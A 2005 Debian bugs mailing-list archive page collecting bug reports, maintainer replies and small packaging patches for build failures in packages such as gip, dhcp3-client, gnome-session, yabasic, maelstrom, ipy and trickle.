Bug#324756: marked as done (Uninstallable on sid; needs rebuild due to the C++ ABI transition)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Mon, 29 Aug 2005 23:32:06 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#324756: fixed in gip 1.6.0.1-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 23 Aug 2005 20:17:35 +
From [EMAIL PROTECTED] Tue Aug 23 13:17:35 2005
Return-path: [EMAIL PROTECTED]
Received: from 92_245.btc-net.bg (grubian.yavor.doganov.org) [213.91.245.92] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E7fDC-0006qS-00; Tue, 23 Aug 2005 13:17:35 -0700
Received: from patilan.yavor.doganov.org ([192.168.0.2])
by grubian.yavor.doganov.org with esmtp (Exim 4.52)
id 1E7fLn-0004F2-0z; Tue, 23 Aug 2005 23:26:27 +0300
Received: from yavor by patilan.yavor.doganov.org with local (Exim 4.52)
id 1E7fEg-0002Ey-FJ; Tue, 23 Aug 2005 23:19:06 +0300
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Yavor Doganov [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: Uninstallable on sid; needs rebuild due to the C++ ABI transition
X-Mailer: reportbug 3.16
Date: Tue, 23 Aug 2005 23:19:05 +0300
Message-Id: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: gip
Version: 1.4.0.1-2
Severity: grave
Tags: sid

Since libglibmm-2.4-1 and libgtkmm-2.4-1 were renamed to
libglibmm-2.4-1c2 and libgtkmm-2.4-1c2 accordingly, the package has to
be rebuilt as part of the C++ ABI transition.

-- 
Yavor Doganov   JID: [EMAIL PROTECTED]
Free Software Association - Bulgaria   http://fsa-bg.org
GNOME in Bulgarian! http://gnome.cult.bg

---
Received: (at 324756-close) by bugs.debian.org; 30 Aug 2005 06:39:28 +
From [EMAIL PROTECTED] Mon Aug 29 23:39:28 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1E9zfC-0001y2-00; Mon, 29 Aug 2005 23:32:06 -0700
From: Khalid El Fathi [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#324756: fixed in gip 1.6.0.1-1
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Mon, 29 Aug 2005 23:32:06 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: gip
Source-Version: 1.6.0.1-1

We believe that the bug you reported is fixed in the latest version of
gip, which is due to be installed in the Debian FTP archive:

gip_1.6.0.1-1.diff.gz
  to pool/main/g/gip/gip_1.6.0.1-1.diff.gz
gip_1.6.0.1-1.dsc
  to pool/main/g/gip/gip_1.6.0.1-1.dsc
gip_1.6.0.1-1_i386.deb
  to pool/main/g/gip/gip_1.6.0.1-1_i386.deb
gip_1.6.0.1.orig.tar.gz
  to pool/main/g/gip/gip_1.6.0.1.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Khalid El Fathi [EMAIL PROTECTED] (supplier of updated gip package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Wed, 13 Jul 2005 14:46:49 +0200
Source: gip
Binary: gip
Architecture: source i386
Version: 1.6.0.1-1
Distribution: unstable
Urgency: low
Maintainer: Khalid El Fathi [EMAIL PROTECTED]
Changed-By: Khalid El Fathi [EMAIL PROTECTED]
Description: 
 gip- IP calculator for GNOME desktop environment
Closes: 324756
Changes: 
 gip (1.6.0.1-1) unstable; urgency=low
 .
   * New upstream release.
   * Updated to Standards-Version 3.6.2.
   * New dependencies after C++ ABI transition (Closes: bug#324756).
Files: 
 202b8d3deb8b4e821142f130bd439baf 582 gnome optional gip_1.6.0.1-1.dsc
 adc5159a56828f4d430f91715dacc7f1 51043 gnome optional 

Bug#321987: marked as done (dhcp3-client: dhclient3 fails on sparc64)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 16:45:58 +1000
with message-id [EMAIL PROTECTED]
and subject line Bug#321987: dhcp3-client: dhclient3 fails on sparc64
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 8 Aug 2005 15:16:10 +
From [EMAIL PROTECTED] Mon Aug 08 08:16:10 2005
Return-path: [EMAIL PROTECTED]
Received: from postfix3-2.free.fr [213.228.0.169] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E29MH-00050d-00; Mon, 08 Aug 2005 08:16:09 -0700
Received: from poussiere (pat35-1-82-231-148-189.fbx.proxad.net 
[82.231.148.189])
by postfix3-2.free.fr (Postfix) with ESMTP id CEA64C0C3;
Mon,  8 Aug 2005 17:16:07 +0200 (CEST)
Received: from fdl by poussiere with local (Exim 4.52)
id 1E29ME-CX-Cm; Mon, 08 Aug 2005 17:16:06 +0200
Content-Type: multipart/mixed; boundary1075619935==
MIME-Version: 1.0
From: Frederic Daniel Luc LEHOBEY [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: dhcp3-client: dhclient3 fails on sparc64
X-Mailer: reportbug 3.15
Date: Mon, 08 Aug 2005 17:16:06 +0200
X-Debbugs-Cc: [EMAIL PROTECTED]
Message-Id: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-9.0 required=4.0 tests=BAYES_00,HAS_PACKAGE,WIFE,
X_DEBBUGS_CC autolearn=ham version=2.60-bugs.debian.org_2005_01_02

This is a multi-part MIME message sent by reportbug.

--===1075619935==
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Package: dhcp3-client
Version: 3.0.2-3
Severity: important

Hi,

I found dhclient3 to fail on sparc64 architecture with the following 
error since my latest sid update:
# dhclient3 eth0
Internet Systems Consortium DHCP Client V3.0.2
Copyright 2004 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/products/DHCP

sit0: unknown hardware address type 776
sit0: unknown hardware address type 776
Listening on LPF/eth0/08:00:20:89:57:1a
Sending on   LPF/eth0/08:00:20:89:57:1a
Sending on   Socket/fallback
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 4
Erreur du bus

(I do not understand why the error message is in French as I have put my 
locale to be C, its meaning is `bus error').

I confirm the bug on two different sid machines (kernels 2.4.26-sparc64 
and 2.4.27-2-sparc64) that both used to work flawlessly with the 
dhcp3-client_3.0.2-1_sparc.deb version of your package).

If of any help I have also included the strace of the command. 

Fortunately dhcp-client is still working (as pump seems to be broken 
too).

Thanks for you work on dhcp3 and best regards,
Frederic Lehobey

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: sparc (sparc64)
Shell:  /bin/sh linked to /bin/dash
Kernel: Linux 2.4.26-sparc64
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages dhcp3-client depends on:
ii  debconf   1.4.56 Debian configuration management sy
ii  debianutils   2.14.1 Miscellaneous utilities specific t
ii  dhcp3-common  3.0.2-3Common files used by all the dhcp3
ii  libc6 2.3.5-3GNU C Library: Shared libraries an

dhcp3-client recommends no packages.

--===1075619935==
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename=strace-dhclient3

execve(/sbin/dhclient3, [dhclient3, eth0], [/* 15 vars */]) = 0
uname({sys=Linux, node=poussiere, ...}) = 0
brk(0)  = 0xb6f70
access(/etc/ld.so.nohwcap, F_OK)  = -1 ENOENT (No such file or directory)
access(/etc/ld.so.preload, R_OK)  = -1 ENOENT (No such file or directory)
open(/etc/ld.so.cache, O_RDONLY)  = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=28951, ...}) = 0
mmap(NULL, 28951, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7001c000
close(3)= 0
access(/etc/ld.so.nohwcap, F_OK)  = -1 ENOENT (No such file or directory)
open(/lib/libc.so.6, O_RDONLY)= 3
read(3, \177ELF\1\2\1\0\0\0\0\0\0\0\0\0\0\3\0\2\0\0\0\1\0\1\312..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1201740, ...}) = 0

Bug#325665: hostap-source: Can not build driver for 2.6.12-1-k7

2005-08-30 Thread DEMAINE Benoit-Pierre
Package: hostap-source
Version: 1:0.4.1-1
Severity: grave
Justification: renders package unusable


after installing hostap-source and linux-image-2.6.12-1-k7
I enter the source directory, and make reports about:
/lib/module/2.6.12-1-k7/build/.config: no sunch file or ...

(sorry, I have to manually copy stuff; broken mouse)

so: cant compile stuff = unusable driver.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-1-k7
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1) (ignored: LC_ALL set to 
en_GB)

Versions of packages hostap-source depends on:
ii  bzip2 1.0.2-8high-quality block-sorting file co
ii  debhelper 4.9.6  helper programs for debian/rules
ii  gcc   4:4.0.1-3  The GNU C compiler
ii  module-assistant  0.9.8  tool to make module package creati

hostap-source recommends no packages.

-- no debconf information

-- 
DEMAINE Benoit-Pierre (aka DoubleHP ) http://www.demaine.info/
\_o If computing were an exact science, IT engineers would not have work o_/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325639: gnome-session: FTBFS: depends on -Wl,--as-needed

2005-08-30 Thread Josselin Mouette
Le lundi 29 août 2005 à 15:57 -0700, Steve Langasek a écrit :
 Package: gnome-session
 Version: 2.10.0-6
 Severity: serious
 
 The latest version of gnome-session fails to build on alpha and sparc
 with the following error:
 
 /bin/sh ../libtool --mode=link cc  -g -Wall -O2  -Wl,-O1 -Wl,--as-needed -o 
 logout-test  logout-test.o util.o gsm-multiscreen.o gdm-logout-action.o 
 egg-screen-exec.o egg-screen-help.o egg-screen-url.o -lSM -lICE  
 -L/usr/X11R6/lib -lX11  -Wl,--export-dynamic -pthread -L/usr/X11R6/lib 
 -lgnomeui-2 -lSM -lICE -lbonoboui-2 -lxml2 -lz -lgnomecanvas-2 -lgnome-2 
 -lpopt -lart_lgpl_2 -lgtk-x11-2.0 -lgdk-x11-2.0 -latk-1.0 -lgdk_pixbuf-2.0 
 -lpangoxft-1.0 -lpangox-1.0 -lpangoft2-1.0 -lpango-1.0 -lgobject-2.0 
 -lgnomevfs-2 -lbonobo-2 -lgconf-2 -lbonobo-activation -lORBit-2 -lgmodule-2.0 
 -ldl -lgthread-2.0 -lglib-2.0 -lesd -laudiofile -lm   
 cc -g -Wall -O2 -Wl,-O1 -Wl,--as-needed -o logout-test logout-test.o util.o 
 gsm-multiscreen.o gdm-logout-action.o egg-screen-exec.o egg-screen-help.o 
 egg-screen-url.o -Wl,--export-dynamic  -L/usr/X11R6/lib -pthread 
 /usr/lib/libgnomeui-2.so -L/usr/lib /usr/lib/libgnome-keyring.so 
 /usr/lib/libjpeg.so /usr/lib/libbonoboui-2.so -lSM -lICE -lX11 
 /usr/lib/libgnomecanvas-2.so /usr/lib/libgnome-2.so /usr/lib/libart_lgpl_2.so 
 /usr/lib/libgtk-x11-2.0.so /usr/lib/libgdk-x11-2.0.so /usr/lib/libatk-1.0.so 
 /usr/lib/libgdk_pixbuf-2.0.so /usr/lib/libpangoxft-1.0.so 
 /usr/lib/libpangox-1.0.so /usr/lib/libpangoft2-1.0.so 
 /usr/lib/libpango-1.0.so /usr/lib/libgnomevfs-2.so /usr/lib/libxml2.so 
 /usr/lib/libgnutls.so /usr/lib/libtasn1.so /usr/lib/libgcrypt.so -lnsl 
 /usr/lib/libgpg-error.so -lz -lresolv -lrt /usr/lib/libbonobo-2.so 
 /usr/lib/libgconf-2.so /usr/lib/libbonobo-activation.so 
 /usr/lib/libORBitCosNaming-2.so /usr/lib/libORBit-2.so /usr/lib/libpopt.so 
 /usr/lib/libgobject-2.0.so /usr/lib/libgmodule-2.0.so -ldl 
 /usr/lib/libgthread-2.0.so -lpthread /usr/lib/libglib-2.0.so 
 /usr/lib/libesd.so /usr/lib/libaudiofile.so -lm
 /usr/lib/gcc/sparc-linux-gnu/4.0.2/../../../../lib/crt1.o:../sysdeps/sparc/sparc32/elf/start.S:60:
  multiple definition of `_PROCEDURE_LINKAGE_TABLE_'
 /usr/bin/ld: Disabling relaxation: it will not work with multiple definitions
 collect2: ld returned 1 exit status
 make[4]: *** [logout-test] Error 1
 
 Full build logs can be found at
 http://buildd.debian.org/fetch.php?pkg=gnome-sessionarch=alphaver=2.10.0-6stamp=1125236435file=log
 and
 http://buildd.debian.org/fetch.php?pkg=gnome-sessionarch=sparcver=2.10.0-6stamp=1125310684file=log.
 
 This failure occurs because gnome-session relies on -Wl,--as-needed for
 linking.  This is a new and fairly experimental option which is
 currently broken on alpha and sparc, and one which I would argue it is a
 bad idea to use in general.  Please fix your package so that it does not
 depend on this linker option for building.

A patch for binutils is available in bug #320697. I'd rather not
reintroduce tons of indirect dependencies in GNOME stuff, especially
during several transitions, when the correct fix is available.
-- 
 .''`.   Josselin Mouette/\./\
: :' :   [EMAIL PROTECTED]
`. `'[EMAIL PROTECTED]
   `-  Debian GNU/Linux -- The power of freedom



Bug#325665: hostap-source: Can not build driver for 2.6.12-1-k7

2005-08-30 Thread Andres Salomon
On Tue, 2005-08-30 at 08:54 +0200, DEMAINE Benoit-Pierre wrote:
 Package: hostap-source
 Version: 1:0.4.1-1
 Severity: grave
 Justification: renders package unusable
 
 
 after installing hostap-source and linux-image-2.6.12-1-k7
 I enter the source directory, and make reports about:
 /lib/module/2.6.12-1-k7/build/.config: no sunch file or ...
 


What are you actually running?  Just issuing make isn't enough; use
module-assistant or make-kpkg instead.



 (sorry, I have to manually copy stuff; broken mouse)
 
 so: cant compile stuff = unusable driver.
 
 -- System Information:
 Debian Release: testing/unstable
   APT prefers unstable
   APT policy: (500, 'unstable'), (500, 'stable')
 Architecture: i386 (i686)
 Shell:  /bin/sh linked to /bin/bash
 Kernel: Linux 2.6.12-1-k7
 Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1) (ignored: LC_ALL set 
 to en_GB)
 
 Versions of packages hostap-source depends on:
 ii  bzip2 1.0.2-8high-quality block-sorting file 
 co
 ii  debhelper 4.9.6  helper programs for debian/rules
 ii  gcc   4:4.0.1-3  The GNU C compiler
 ii  module-assistant  0.9.8  tool to make module package 
 creati
 
 hostap-source recommends no packages.
 
 -- no debconf information
 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325639: gnome-session: FTBFS: depends on -Wl,--as-needed

2005-08-30 Thread Steve Langasek
On Tue, Aug 30, 2005 at 09:05:59AM +0200, Josselin Mouette wrote:
 Le lundi 29 août 2005 à 15:57 -0700, Steve Langasek a écrit :
  Package: gnome-session
  Version: 2.10.0-6
  Severity: serious
  
  The latest version of gnome-session fails to build on alpha and sparc
  with the following error:
  
  /bin/sh ../libtool --mode=link cc  -g -Wall -O2  -Wl,-O1 -Wl,--as-needed -o 
  logout-test  logout-test.o util.o gsm-multiscreen.o gdm-logout-action.o 
  egg-screen-exec.o egg-screen-help.o egg-screen-url.o -lSM -lICE  
  -L/usr/X11R6/lib -lX11  -Wl,--export-dynamic -pthread -L/usr/X11R6/lib 
  -lgnomeui-2 -lSM -lICE -lbonoboui-2 -lxml2 -lz -lgnomecanvas-2 -lgnome-2 
  -lpopt -lart_lgpl_2 -lgtk-x11-2.0 -lgdk-x11-2.0 -latk-1.0 -lgdk_pixbuf-2.0 
  -lpangoxft-1.0 -lpangox-1.0 -lpangoft2-1.0 -lpango-1.0 -lgobject-2.0 
  -lgnomevfs-2 -lbonobo-2 -lgconf-2 -lbonobo-activation -lORBit-2 
  -lgmodule-2.0 -ldl -lgthread-2.0 -lglib-2.0 -lesd -laudiofile -lm   
  cc -g -Wall -O2 -Wl,-O1 -Wl,--as-needed -o logout-test logout-test.o util.o 
  gsm-multiscreen.o gdm-logout-action.o egg-screen-exec.o egg-screen-help.o 
  egg-screen-url.o -Wl,--export-dynamic  -L/usr/X11R6/lib -pthread 
  /usr/lib/libgnomeui-2.so -L/usr/lib /usr/lib/libgnome-keyring.so 
  /usr/lib/libjpeg.so /usr/lib/libbonoboui-2.so -lSM -lICE -lX11 
  /usr/lib/libgnomecanvas-2.so /usr/lib/libgnome-2.so 
  /usr/lib/libart_lgpl_2.so /usr/lib/libgtk-x11-2.0.so 
  /usr/lib/libgdk-x11-2.0.so /usr/lib/libatk-1.0.so 
  /usr/lib/libgdk_pixbuf-2.0.so /usr/lib/libpangoxft-1.0.so 
  /usr/lib/libpangox-1.0.so /usr/lib/libpangoft2-1.0.so 
  /usr/lib/libpango-1.0.so /usr/lib/libgnomevfs-2.so /usr/lib/libxml2.so 
  /usr/lib/libgnutls.so /usr/lib/libtasn1.so /usr/lib/libgcrypt.so -lnsl 
  /usr/lib/libgpg-error.so -lz -lresolv -lrt /usr/lib/libbonobo-2.so 
  /usr/lib/libgconf-2.so /usr/lib/libbonobo-activation.so 
  /usr/lib/libORBitCosNaming-2.so /usr/lib/libORBit-2.so /usr/lib/libpopt.so 
  /usr/lib/libgobject-2.0.so /usr/lib/libgmodule-2.0.so -ldl 
  /usr/lib/libgthread-2.0.so -lpthread /usr/lib/libglib-2.0.so 
  /usr/lib/libesd.so /usr/lib/libaudiofile.so -lm
  /usr/lib/gcc/sparc-linux-gnu/4.0.2/../../../../lib/crt1.o:../sysdeps/sparc/sparc32/elf/start.S:60:
   multiple definition of `_PROCEDURE_LINKAGE_TABLE_'
  /usr/bin/ld: Disabling relaxation: it will not work with multiple 
  definitions
  collect2: ld returned 1 exit status
  make[4]: *** [logout-test] Error 1
  
  Full build logs can be found at
  http://buildd.debian.org/fetch.php?pkg=gnome-sessionarch=alphaver=2.10.0-6stamp=1125236435file=log
  and
  http://buildd.debian.org/fetch.php?pkg=gnome-sessionarch=sparcver=2.10.0-6stamp=1125310684file=log.
  
  This failure occurs because gnome-session relies on -Wl,--as-needed for
  linking.  This is a new and fairly experimental option which is
  currently broken on alpha and sparc, and one which I would argue it is a
  bad idea to use in general.  Please fix your package so that it does not
  depend on this linker option for building.

 A patch for binutils is available in bug #320697. I'd rather not
 reintroduce tons of indirect dependencies in GNOME stuff, especially
 during several transitions, when the correct fix is available.

The *correct* fix is for pkg-config and libtool to not be broken.
-Wl,--as-needed is a crutch, not a correct fix...

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature


Bug#325283: yabasic: FTBFS: Missing Build-Depends on 'libxt-dev'

2005-08-30 Thread Andreas Jochens
tags 325283 +patch
thanks

With the attached patch, which adds 'libxt-dev' to the Build-Depends,
'yabasic' can be built in a clean 'unstable' chroot.

Regards
Andreas Jochens

diff -urN ../tmp-orig/yabasic-2.761/debian/control ./debian/control
--- ../tmp-orig/yabasic-2.761/debian/control2005-08-30 07:28:49.0 
+
+++ ./debian/control2005-08-30 07:28:45.0 +
@@ -3,7 +3,7 @@
 Priority: optional
 Maintainer: Matej Vela [EMAIL PROTECTED]
 Standards-Version: 3.6.2
-Build-Depends: debhelper (= 4), autotools-dev, libncurses5-dev, libsm-dev, 
libice-dev, libx11-dev
+Build-Depends: debhelper, autotools-dev, libncurses5-dev, libsm-dev, 
libice-dev, libx11-dev, libxt-dev
 
 Package: yabasic
 Architecture: any


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325672: maelstrom: FTBFS: Missing Build-Depends on 'autotools-dev'

2005-08-30 Thread Andreas Jochens
Package: maelstrom
Version: 1.4.3-L3.0.6-5
Severity: serious
Tags: patch

When building 'maelstrom' in a clean 'unstable' chroot,
I get the following error:

 debian/rules build
test -f debian/rules -a -f Maelstrom.h
set -e;
cp /usr/share/misc/config.{guess,sub} .
cp: cannot stat `/usr/share/misc/config.guess': No such file or directory
cp: cannot stat `/usr/share/misc/config.sub': No such file or directory
make: *** [build] Error 1

Please add the missing Build-Depends on 'autotools-dev'
to debian/control.

Regards
Andreas Jochens

diff -urN ../tmp-orig/maelstrom-1.4.3-L3.0.6/debian/control ./debian/control
--- ../tmp-orig/maelstrom-1.4.3-L3.0.6/debian/control   2005-08-30 
07:33:06.0 +
+++ ./debian/control2005-08-30 07:32:52.0 +
@@ -3,7 +3,7 @@
 Priority: optional
 Maintainer: Christoph Baumann [EMAIL PROTECTED] 
 Standards-Version: 3.6.1 
-Build-Depends: libsdl1.2-dev (= 1.0.0), libsdl-net1.2-dev, libc6-dev, 
xlibs-dev, debhelper
+Build-Depends: debhelper, autotools-dev, libsdl1.2-dev (= 1.0.0), 
libsdl-net1.2-dev, libc6-dev, xlibs-dev
 
 Package: maelstrom
 Architecture: any


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325681: ipy: FTBFS: Missing Build-Depends on 'python-dev'

2005-08-30 Thread Andreas Jochens
Package: ipy
Version: 0.42-2
Severity: serious
Tags: patch

When building 'ipy' in a clean 'unstable' chroot,
I get the following error:

dh_python -ppython-ipy
dh_python: Python is not installed, aborting. (Probably forgot to Build-Depend 
on python.)
make: *** [binary-install/python-ipy] Error 1

Please add the missing Build-Depends on 'python-dev'
to debian/control.

Regards
Andreas Jochens

diff -urN ../tmp-orig/ipy-0.42/debian/control ./debian/control
--- ../tmp-orig/ipy-0.42/debian/control 2005-08-30 07:52:12.0 +
+++ ./debian/control2005-08-30 07:52:04.0 +
@@ -2,7 +2,7 @@
 Section: python
 Priority: optional
 Maintainer: Morten Werner Olsen [EMAIL PROTECTED]
-Build-Depends-Indep: debhelper (= 4.1.0), cdbs, python2.3, python2.3-dev, 
python2.4, python2.4-dev
+Build-Depends-Indep: debhelper (= 4.1.0), cdbs, python-dev, python2.3, 
python2.3-dev, python2.4, python2.4-dev
 Standards-Version: 3.6.2
 
 Package: python-ipy


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325679: utidylib: FTBFS: Missing Build-Depends on 'python-dev'

2005-08-30 Thread Andreas Jochens
Package: utidylib
Version: 0.2-1
Severity: serious
Tags: patch

When building 'utidylib' in a clean 'unstable' chroot,
I get the following error:

cd .  python setup.py build --build-base=./build
/bin/sh: python: command not found
make: *** [common-build-impl] Error 127

Please add the missing Build-Depends on 'python-dev'
to debian/control.

Regards
Andreas Jochens

diff -urN ../tmp-orig/utidylib-0.2/debian/control ./debian/control
--- ../tmp-orig/utidylib-0.2/debian/control 2005-08-30 07:48:06.0 
+
+++ ./debian/control2005-08-30 07:48:02.0 +
@@ -2,7 +2,7 @@
 Section: web
 Priority: optional
 Maintainer: Igor Stroh [EMAIL PROTECTED]
-Build-Depends-Indep: debhelper (= 4.1.38), cdbs, python2.3-dev, 
python2.4-dev, dpatch
+Build-Depends-Indep: debhelper (= 4.1.38), cdbs, python-dev, python2.3-dev, 
python2.4-dev, dpatch
 Standards-Version: 3.6.2.1
 
 Package: python-utidylib


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325678: svnmailer: FTBFS: cannot stat `debian/svnmailer.conf.example': No such file or directory

2005-08-30 Thread Andreas Jochens
Package: svnmailer
Version: 1.0.5-1
Severity: serious
Tags: patch

When building 'svnmailer' on unstable,
I get the following error:

dh_installexamples
cp: cannot stat `debian/svnmailer.conf.example': No such file or directory
dh_installexamples: command returned error code 256
make: *** [binary-arch] Error 1

With the attached patch 'svnmailer' can be built on unstable.

Regards
Andreas Jochens

diff -urN ../tmp-orig/svnmailer-1.0.5/debian/rules ./debian/rules
--- ../tmp-orig/svnmailer-1.0.5/debian/rules2005-08-30 07:46:08.0 
+
+++ ./debian/rules  2005-08-30 07:45:48.0 +
@@ -67,7 +67,7 @@
dh_testroot
dh_installchangelogs CHANGES
dh_installdocs
-   dh_installexamples
+#  dh_installexamples
dh_link
dh_strip
dh_compress


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#324580: trickle: [PATCH] fix FTBFS from a local #define conflicting with a system typedef

2005-08-30 Thread Eric Wong
Package: trickle
Version: 1.07-3
Followup-For: Bug #324580


I've modified the upstream source directly to minimize the diff.  The
other approach would be to hack modify the configure.in autotools file
and generate a humongous diff.gz, which I'd rather avoid.

This is intended as a workaround for Debian sid, but it's a good idea to
notify upstream of the problem and decide if there's a cleaner way to
fix this.  This package still builds with or without the below patch on
my Sarge chroot.

diff -rup -x debian orig++trickle-1.07/client.c trickle-1.07/client.c
--- orig++trickle-1.07/client.c 2003-05-08 19:16:42.0 -0700
+++ trickle-1.07/client.c   2005-08-30 00:36:57.672186709 -0700
@@ -34,6 +34,9 @@
 #include string.h
 
 #ifdef HAVE_NETINET_IN_H
+# ifdef in_addr_t
+#   undef in_addr_t
+# endif /* workaround for the in_addr_t #defined in config.h */
 #include netinet/in.h
 #endif /* HAVE_NETINET_IN_H */
 
diff -rup -x debian orig++trickle-1.07/trickle-overload.c 
trickle-1.07/trickle-overload.c
--- orig++trickle-1.07/trickle-overload.c   2004-12-12 17:21:53.0 
-0800
+++ trickle-1.07/trickle-overload.c 2005-08-30 00:36:57.677185397 -0700
@@ -24,6 +24,9 @@
 #include sys/time.h
 #endif /* HAVE_SYS_TIME_H */
 
+# ifdef in_addr_t
+#   undef in_addr_t
+# endif /* workaround for the in_addr_t #defined in config.h */
 #include netinet/in.h
 
 #ifdef HAVE_ERR_H
diff -rup -x debian orig++trickle-1.07/tricklectl.c trickle-1.07/tricklectl.c
--- orig++trickle-1.07/tricklectl.c 2004-12-12 15:50:10.0 -0800
+++ trickle-1.07/tricklectl.c   2005-08-30 00:36:57.677185397 -0700
@@ -33,6 +33,9 @@
 #endif /* defined(HAVE_TIME_H)  defined(TIME_WITH_SYS_TIME) */
 
 #ifdef HAVE_NETINET_IN_H
+# ifdef in_addr_t
+#   undef in_addr_t
+# endif /* workaround for the in_addr_t #defined in config.h */
 #include netinet/in.h
 #endif /* HAVE_NETINET_IN_H */
 
diff -rup -x debian orig++trickle-1.07/trickled.c trickle-1.07/trickled.c
--- orig++trickle-1.07/trickled.c   2003-12-12 14:33:23.0 -0800
+++ trickle-1.07/trickled.c 2005-08-30 00:36:57.679184872 -0700
@@ -30,6 +30,9 @@
 #include sys/time.h
 #endif /* HAVE_SYS_TIME_H */
 
+#ifdef in_addr_t
+#  undef in_addr_t
+#endif /* workaround for the in_addr_t #defined in config.h */
 #include netinet/in.h
 #include netinet/in_systm.h
 
diff -rup -x debian orig++trickle-1.07/trickledu.c trickle-1.07/trickledu.c
--- orig++trickle-1.07/trickledu.c  2004-02-12 22:11:21.0 -0800
+++ trickle-1.07/trickledu.c2005-08-30 00:36:57.680184609 -0700
@@ -30,6 +30,9 @@
 #endif /* defined(HAVE_TIME_H)  defined(TIME_WITH_SYS_TIME) */
 
 #ifdef HAVE_NETINET_IN_H
+# ifdef in_addr_t
+#   undef in_addr_t
+# endif /* workaround for the in_addr_t #defined in config.h */
 #include netinet/in.h
 #endif /* HAVE_NETINET_IN_H */
 


/End of diff


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#318665: marked as done (kde-i18-fr: does not contains message catalogs (.mo files))

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 01:18:10 -0700
